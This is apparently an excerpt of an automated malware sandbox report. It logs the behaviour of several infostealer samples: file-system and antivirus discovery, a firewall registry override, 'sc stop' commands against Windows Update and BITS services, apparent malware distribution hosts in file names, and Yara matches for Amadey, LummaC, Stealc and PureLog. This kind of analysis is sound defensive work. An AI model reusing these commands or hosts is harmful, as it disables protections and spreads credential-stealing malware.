Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Queries volume information: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Queries volume information: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe VolumeInformation
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Queries volume information: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe VolumeInformation
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation

Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe

Code function: 3_2_00841A98 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_00841A98

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

8_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

8_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_67C08390 NSS_GetVersion,

8_2_67C08390

Source: C:\Users\user\Desktop\bomb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Users\user\sysvplervcs.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverride

Stops critical windows services

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait

Source: httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe, 00000011.00000002.1892611432.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: bomb.exe, 00000000.00000002.2651263420.000001343175E000.00000004.00000800.00020000.00000000.sdmp, httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe, 00000011.00000002.1892611432.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe
Source: MSBuild.exe, 00000008.00000002.3090602331.0000000001568000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 40.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe.3749970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.4297613922.0000000003749000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.4200675181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Go Injector

Source: Yara match	File source: 00000032.00000002.3173981696.00007FF70072D000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.2113906593.00007FF70072D000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2651263420.000001342F7AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bomb.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: 49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.32a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.3250000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.3250000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3020983924.0000000003250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match

File source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.38b5570.0.raw.unpack, type: UNPACKEDPE
